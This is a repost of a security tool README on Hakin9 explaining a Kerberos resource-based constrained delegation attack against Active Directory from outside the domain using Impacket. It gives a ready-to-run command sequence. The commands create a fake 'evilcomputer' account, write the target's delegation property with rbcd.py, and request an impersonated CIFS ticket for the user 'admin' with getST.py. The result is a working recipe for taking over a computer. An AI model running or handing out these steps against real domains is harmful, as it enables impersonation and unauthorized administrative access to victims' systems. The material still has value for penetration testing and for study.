Rbcd-Attack – Kerberos Resource-Based Constrained Delegation Attack From Outside Using Impacket
This repo is about a practical attack against Kerberos Resource-Based Constrained Delegation in a Windows Active Directory Domain.
The difference from other common implementations is that we are launching the attack from outside of the Windows Domain, not from a domain-joined (usually Windows) computer.
The attack is implemented using only Python3 Impacket (and its dependencies). Tested on Arch with up-to-date Impacket (0.9.21 as of writing).
The Attack
In summary, without any deep details, the attack targets a domain computer, exactly the service principals related to the target domain computer.
What we need here as prerequisites:
- a domain account with write access to the target computer (exactly write access to the msDS-AllowedToActOnBehalfOfOtherIdentity property of the target computer domain object)
- permission to create new computer accounts (this is usually default, see MachineAccountQuota)
- LDAP (389/tcp) and SAMR (445/tcp) (or LDAPS (636/tcp)) access to the DC
- Kerberos (88/tcp) access to the DC
The attack path at a very high level:
- Create a fake computer
- Abuse the msDS-AllowedToActOnBehalfOfOtherIdentity property of the target
- Request impersonated Service Tickets (S4U) for the target computer
Impact:
- Impersonated Service Tickets may allow high-level access to services on the target like CIFS, HTTP, etc, if the impersonated account has privileges. Often takeover of the computer.
Common toolsets
The common toolsets for this attack operate on a domain-joined Windows computer using:
- Powermad for adding new computer accounts
- Powerview from the PowerSploit dev branch for abusing msDS-AllowedToActOnBehalfOfOtherIdentity
- Rubeus for S4U ticket operations
Impacket implementation
This implementation uses pure Impacket from outside the Domain.
Creating the fake computer
Using the addcomputer.py example from Impacket, let's create a fake computer (called evilcomputer):
addcomputer.py -computer-name 'evilcomputer$' -computer-pass ev1lP@sS -dc-ip 192.168.33.203 ecorp.local/test:ohW9Lie0
Modifying delegation rights
Implemented the script rbcd.py found here in the repo which adds the related security descriptor of the newly created EVILCOMPUTER to the msDS-AllowedToActOnBehalfOfOtherIdentity property of the target computer.
./rbcd.py -f EVILCOMPUTER -t WEB -dc-ip 192.168.33.203 ecorp\\test:ohW9Lie0
The script makes heavy use of the Python classes in the ntlmrelayx.py Impacket example. For help and an example, call the script with no options.
Getting the impersonated service ticket
Now everything is ready for abusing the Constrained Delegation by an S4U2Self query and getting an impersonated Service Ticket for the target computer. With the getST.py Impacket example script:
getST.py -spn cifs/WEB.ecorp.local -impersonate admin -dc-ip 192.168.33.203 ecorp.local/EVILCOMPUTER$:ev1lP@sS
The above command fetches a CIFS Service Ticket on behalf of the targeted domain user admin and stores it in the file admin.ccache.
After adding the file path to the KRB5CCNAME variable, the ticket is usable for Kerberos clients.
export KRB5CCNAME=`pwd`/admin.ccache
klist
References
For details about abusing Resource-Based Constrained Delegation:
- https://shenaniganslabs.io/2019/01/28/Wagging-the-Dog.html
- https://www.harmj0y.net/blog/activedirectory/a-case-study-in-wagging-the-dog-computer-takeover/
- http://www.harmj0y.net/blog/activedirectory/s4u2pwnage/
And one of the most detailed presentations about Kerberos Attacks:
- Constructing Kerberos Attacks with Delegation Primitives slides at Defcon by Elad Shamir and Matt Bush
More: https://github.com/tothi/rbcd-attack
The post Rbcd-Attack – Kerberos Resource-Based Constrained Delegation Attack From Outside Using Impacket appeared first on Hakin9 – IT Security Magazine.